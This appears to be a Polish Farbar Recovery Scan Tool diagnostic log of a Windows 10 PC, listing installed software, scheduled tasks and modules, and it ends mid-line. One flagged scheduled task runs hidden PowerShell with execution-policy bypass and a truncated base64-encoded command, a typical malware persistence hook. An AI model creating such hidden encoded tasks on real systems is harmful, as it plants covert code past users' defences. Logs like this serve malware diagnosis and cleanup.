Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja:30-04-2016 Uruchomiony przez tom615 (2016-05-01 09:50:42) Uruchomiony z C:\Users\tom615\Desktop Windows 10 Pro Wersja 1511 (X64) (2016-04-10 22:29:04) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-3274260535-2468400652-3968369242-500 - Administrator - Disabled) Gość (S-1-5-21-3274260535-2468400652-3968369242-501 - Limited - Disabled) Konto domyślne (S-1-5-21-3274260535-2468400652-3968369242-503 - Limited - Disabled) tom615 (S-1-5-21-3274260535-2468400652-3968369242-1000 - Administrator - Enabled) => C:\Users\tom615 ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0} AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) «Hard West» 1.4.0.0 (HKLM-x32\...\«Hard West»_is1) (Version: 1.4.0.0 - Gambitious Digital Entertainment) µTorrent (HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\uTorrent) (Version: 3.4.7.42300 - BitTorrent Inc.) 7-Zip 15.12 (x64) (HKLM\...\7-Zip) (Version: 15.12 - Igor Pavlov) 7-Zip 15.14 (x64 edition) (HKLM\...\{23170F69-40C1-2702-1514-000001000000}) (Version: 15.14.00.0 - Igor Pavlov) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 15.010.20060 - Adobe Systems Incorporated) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 21.0.0.198 - Adobe Systems Incorporated) Adobe Flash Player 20 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated) Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.4.194 - Adobe Systems, Inc.) Advanced SystemCare 9 (HKLM-x32\...\Advanced SystemCare_is1) (Version: 9.12.0 - IObit) Aktualizacje NVIDIA 2.11.2.46 (Version: 2.11.2.46 - NVIDIA Corporation) Hidden ALLPlayer Pilot (HKLM-x32\...\{146BDBDD-ACD9-4B04-A286-C27471841E8E}_is1) (Version: 1.3 - ALLPlayer Group, Ltd.) ALLPlayer V6.X (HKLM-x32\...\ALLPlayer_is1) (Version: - ALLPlayer Group, Ltd.) AOMEI Partition Assistant Standard Edition 6.0 (HKLM-x32\...\{02F850ED-FD0E-4ED1-BE0B-54981f5BD3D4}_is1) (Version: - AOMEI Technology Co., Ltd.) Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 11.2.2262 - AVAST Software) CCleaner (HKLM\...\CCleaner) (Version: 5.17 - Piriform) DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.2.0.0115 - Disc Soft Ltd) Dead Space 3 wersja 1.0.0.0 (HKLM-x32\...\Dead Space 3_is1) (Version: 1.0.0.0 - GTX Box Team) Detektor Winampa (HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc) Dll-Files Fixer (HKLM-x32\...\Dll-Files Fixer_is1) (Version: 3.3.90 - Dll-Files.com) Driver Booster 2.4 (HKLM-x32\...\Driver Booster_is1) (Version: 2.4 - IObit) Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD) Far Cry 4 Update V1.4 (HKLM-x32\...\RmFyQ3J5NA==_is1) (Version: 1 - ) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 50.0.2661.75 - Google Inc.) Google Update Helper (x32 Version: 1.3.21.169 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden HiJackThis (HKLM-x32\...\{45A66726-69BC-466B-A7A4-12FCBA4883D7}) (Version: 1.0.0 - Trend Micro) IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 5.2.6.101 - IObit) Java 8 Update 73 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418073F0}) (Version: 8.0.730.2 - Oracle Corporation) Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation) Java 8 Update 74 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418074F0}) (Version: 8.0.740.2 - Oracle Corporation) Java 8 Update 74 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218074F0}) (Version: 8.0.740.2 - Oracle Corporation) Java 8 Update 77 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418077F0}) (Version: 8.0.770.3 - Oracle Corporation) Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation) Java 8 Update 92 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418092F0}) (Version: 8.0.920.14 - Oracle Corporation) Java 8 Update 92 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218092F0}) (Version: 8.0.920.14 - Oracle Corporation) K-Lite Codec Pack 12.1.0 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 12.1.0 - KLCP) Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0 - Mozilla) Mozilla Thunderbird 45.0 (x86 pl) (HKLM-x32\...\Mozilla Thunderbird 45.0 (x86 pl)) (Version: 45.0 - Mozilla) Napisy24 (HKLM-x32\...\{D1985DBC-F09E-4317-91B8-932AD0FD4A27}_is1) (Version: 1.3 - Napisy24.pl) NVIDIA GeForce Experience 2.11.2.46 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.2.46 - NVIDIA Corporation) NVIDIA Oprogramowanie systemu PhysX 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation) NVIDIA Sterownik 3D Vision 364.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 364.72 - NVIDIA Corporation) NVIDIA Sterownik dźwięku HD 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation) NVIDIA Sterownik graficzny 364.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 364.72 - NVIDIA Corporation) NVIDIA Sterownik kontrolera 3D Vision 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation) Opera Stable 36.0.2130.65 (HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\Opera 36.0.2130.65) (Version: 36.0.2130.65 - Opera Software) Origin (HKLM-x32\...\Origin) (Version: 9.11.5.17432 - Electronic Arts, Inc.) Panel sterowania NVIDIA 364.72 (Version: 364.72 - NVIDIA Corporation) Hidden PhotoScape (HKLM-x32\...\PhotoScape) (Version: - ) Podatnik.info PIT pro 2015 wersja 2.2.20.0 (HKLM-x32\...\{B239B43B-3E99-40B0-80BF-1B1BCA868D4E}_is1) (Version: 2.2.20.0 - Podatnik.info Sp. z o.o.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7746 - Realtek Semiconductor Corp.) SafeZone Stable 1.48.2066.101 (x32 Version: 1.48.2066.101 - Avast Software) Hidden SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (Version: 2.11.2.46 - NVIDIA Corporation) Hidden Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation) Skype™ 7.22 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.22.109 - Skype Technologies S.A.) Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) Surfing Protection (HKLM-x32\...\IObit Surfing Protection_is1) (Version: 1.3 - IObit) swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden Uplay (HKLM-x32\...\Uplay) (Version: 18.1 - Ubisoft) Winamp (HKLM-x32\...\Winamp) (Version: 5.666 - Nullsoft, Inc) WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH) World of Tanks (HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net) World of Warships (HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C814eu}_is1) (Version: - Wargaming.net) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\tom615\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {01B58BD6-0D76-4563-BA27-21DAE77AE38F} - System32\Tasks\{ED2A85B2-4B28-46F1-95C8-CA1A672B5F87} => pcalua.exe -a "C:\Program Files (x86)\Tencent\QQPCMgr\11.4.17339.217\UninstallTips.exe" -d "C:\Program Files (x86)\Tencent\QQPCMgr\11.4.17339.217" Task: {03608B5B-29DA-49C6-BD62-0E099197406B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-04-15] (Piriform Ltd) Task: {0C2FCF3E-6E60-4984-BB36-A0E7E9238FC3} - System32\Tasks\DLL-Files.Com Fixer_MONTHLY => C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe [2015-10-30] (Dll-FIles.Com) Task: {0D5872D0-F2D1-44D7-A0CA-8753AE7EC478} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku <==== UWAGA Task: {11A6938D-9F40-48BC-89CA-132F889398F4} - System32\Tasks\Uninstaller_SkipUac_tom615 => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2016-03-04] (IObit) Task: {11ACDC8F-2FFE-4737-A876-B4A5B193B1F0} - System32\Tasks\Driver Booster Update => C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe [2015-07-06] (IObit) Task: {17BF3B3E-2E89-499A-8398-8DE0AA846522} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA Task: {21022C0B-E2CF-4248-86C4-133B61181727} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe Task: {364725D7-83B7-45AD-AD46-85A639B1BCD9} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Brak pliku <==== UWAGA Task: {3E9BB500-162D-45ED-8D4D-F4754B29E294} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe Task: {3F8720E9-C610-489D-BBDE-FB1C56BBB081} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku <==== UWAGA Task: {493BB10B-9485-47C0-8812-1BB126C609F5} - System32\Tasks\ASC9_SkipUac_tom615 => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe [2016-03-18] (IObit) Task: {555CB465-9A2F-4D9E-AAD3-14EBC1401977} - System32\Tasks\Opera scheduled Autoupdate 1455115975 => C:\Users\tom615\AppData\Local\Programs\Opera\launcher.exe [2016-04-11] (Opera Software) Task: {5AFAA844-2A3C-4BCF-8B67-1733860E02D1} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe Task: {5D1FFADD-A213-49AA-BFD8-376DD3C2FE8E} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe Task: {5D3F9B3E-36E5-4DD2-9366-9ED0E5442CF3} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe Task: {5D5C217C-AD64-46B6-92B4-68D49403B1CE} - System32\Tasks\{85F4D989-B896-435E-863B-893BAA1FD4FC} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Rantouch\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\Rantouch\uninstall.dat" -a uninstallme 1CDA7986-8F56-4418-A43C-381D0DC91384 DeviceId=8b648fd8-0dde-9d5e-4067-f2349d35fd02 BarcodeId=51198003 ChannelId=3 DistributerName=APSFWakeNet Task: {5E4000D7-6727-4069-84FF-EE1CDC0D6376} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA Task: {616065C6-4707-4FC1-AC13-315CDD6E2CB0} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Brak pliku <==== UWAGA Task: {658CC27F-AD78-4BD8-9454-70565045332B} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Brak pliku <==== UWAGA Task: {6B0B87C7-AF8F-476A-BFAA-3B411774961D} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe Task: {6BBA79A1-D326-428F-B297-8950D4E537A6} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.) Task: {7086063E-58DF-4E7D-8D33-86F30E1A5E34} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-04-30] (AVAST Software) Task: {712466A6-7324-4AA8-BCCE-88AC2CEFB51E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-22] (Google Inc.) Task: {71795615-3B76-47A0-889A-C0462C45A760} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-03-28] (Adobe Systems Incorporated) Task: {7227DB06-B1BE-42E3-9BD9-8E9172EAAF0E} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe Task: {77D9BD36-F4BB-4F25-A129-EF17974CA530} - System32\Tasks\Driver Booster Scan => C:\Program Files (x86)\IObit\Driver Booster\Scheduler.exe [2015-07-06] (IObit) Task: {77F4D78C-AE90-4F2D-A100-A33A1C17C385} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe Task: {7CAACDB1-BB7D-4F58-9581-9A0F25E47FF0} - System32\Tasks\ASC9_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe [2016-03-15] (IObit) Task: {909B3095-EC62-42DA-9DAA-C0D4B6D5AB3F} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe Task: {92992DAD-8C8E-4976-B849-4DA6B37CE97F} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe Task: {9450DC01-415D-4E7F-8702-E65302E6AD14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku <==== UWAGA Task: {9567D6DB-710E-4C17-B9C5-0A765B9D7FA1} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe Task: {96CC64B8-A871-4C7B-9F2F-BBA3E7730CE0} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA Task: {AB2A297D-0DAE-41CD-B66E-E1BA1F703BD9} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe Task: {AD8E5205-9D74-4BD7-9B51-DAEAED9E8368} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA Task: {B322775F-5236-4D9B-9B3F-F93AFD39C489} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2014-06-24] (Safer-Networking Ltd.) Task: {B4B3A140-FF0B-480F-978C-45A69E9738AB} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_306_pepper.exe [2016-02-10] (Adobe Systems Incorporated) Task: {B6A94025-5764-42B7-A9F8-B47F0CF0CD73} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2016-04-18] () Task: {B8EA7B9A-704F-411C-B64F-715ED1BFA267} - System32\Tasks\SafeZone scheduled Autoupdate 1458384175 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-04-15] (Avast Software) Task: {BBE0278E-AF83-4E81-8089-4FCF856818DC} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe Task: {BE9A2500-5A0F-4712-A4BA-B50880BCA680} - System32\Tasks\Driver Booster SkipUAC (tom615) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe [2015-07-06] (IObit) Task: {BF91B31E-51C3-46CC-9CAB-5FEF2BBE676B} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe Task: {C4D17835-C69C-4706-B8DA-7DBD8CEFDE34} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku <==== UWAGA Task: {C9DB2C1A-7CBB-46CF-8EB3-E8424592A925} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA Task: {CDAA2B66-74D7-490B-9DBD-EB215FC27EFA} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe Task: {CE07150B-944D-4FD2-8CE5-1D5A0F90DF0B} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe Task: {D7EFA217-8419-460F-8225-585C7CF47F50} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe Task: {DA54575F-96F1-4EF6-A555-19CED5D2088A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-22] (Google Inc.) Task: {DE778AA5-55DB-43F8-96B4-7665655B1FAB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe Task: {DFAA31CD-E4E3-4815-9AC9-DF5338D95EA0} - System32\Tasks\{790C0B47-097A-797E-0C11-0A08090A110C} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAIAA7ACAAOwA7ACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4A (dane wartości zawierają 9352 znaków więcej). <==== UWAGA Task: {E9EB1302-662F-40BD-9DC7-C9B5B6F18F6B} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2014-06-24] (Safer-Networking Ltd.) Task: {EEA1FE53-391C-4F7F-AAB2-88C0C407D8FA} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe Task: {EEBF592F-577A-4F42-A778-BCA77617925C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku <==== UWAGA Task: {FBB51D8D-5E99-40A0-8623-73E31B34FCBB} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated) Task: {FDDCEF02-7D66-458E-8B1A-F6F460306850} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe Task: {FE0E3B6A-6B42-4287-89A2-914DC28BBFC5} - System32\Tasks\DLL-Files.Com Fixer_Updates => C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe [2015-10-30] (Dll-FIles.Com) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_306_pepper.exe Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\WINDOWS\Tasks\DLL-Files.Com Fixer_MONTHLY.job => C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe Task: C:\WINDOWS\Tasks\DLL-Files.Com Fixer_Updates.job => C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\Uninstaller_SkipUac_tom615.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ==================== Załadowane moduły (filtrowane) ============== 2015-10-30 09:17 - 2015-10-30 09:17 - 00028672 _____ () C:\WINDOWS\SYSTEM32\efsext.dll 2015-10-30 09:18 - 2015-10-30 09:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll 2016-04-13 05:56 - 2016-03-29 12:20 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll 2016-04-19 19:46 - 2016-04-19 19:46 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe 2016-04-13 05:56 - 2016-03-29 12:20 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll 2016-02-13 19:32 - 2016-02-13 19:32 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll 2016-04-13 05:54 - 2016-04-02 05:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll 2016-04-13 05:55 - 2016-04-02 05:03 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2016-04-13 05:55 - 2016-04-02 04:58 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-04-13 05:56 - 2016-04-02 04:59 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2016-04-13 05:56 - 2016-04-02 05:02 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2016-04-30 22:33 - 2016-04-30 22:33 - 00123344 _____ () C:\Program Files\AVAST Software\Avast\log.dll 2016-04-30 22:33 - 2016-04-30 22:33 - 00135816 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll 2016-04-30 20:54 - 2016-04-30 20:54 - 02892288 _____ () C:\Program Files\AVAST Software\Avast\defs\16043002\algo.dll 2016-04-30 22:33 - 2016-04-30 22:33 - 00479680 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll 2016-04-19 19:46 - 2016-04-19 19:46 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll 2016-02-28 13:59 - 2015-12-23 18:32 - 00355616 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madExcept_.bpl 2016-02-28 13:59 - 2015-12-23 18:32 - 00190240 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madBasic_.bpl 2016-02-28 13:59 - 2015-12-23 18:32 - 00057632 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madDisAsm_.bpl 2016-02-22 15:03 - 2016-02-22 15:03 - 40539648 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll 2016-05-01 03:13 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl 2016-05-01 03:13 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl 2016-05-01 03:13 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl 2016-05-01 03:13 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll 2016-05-01 03:13 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\ProgramData\TEMP:1AAB2E68 [171] AlternateDataStreams: C:\ProgramData\TEMP:B755D674 [134] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== EXE - Powiązania (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com IE 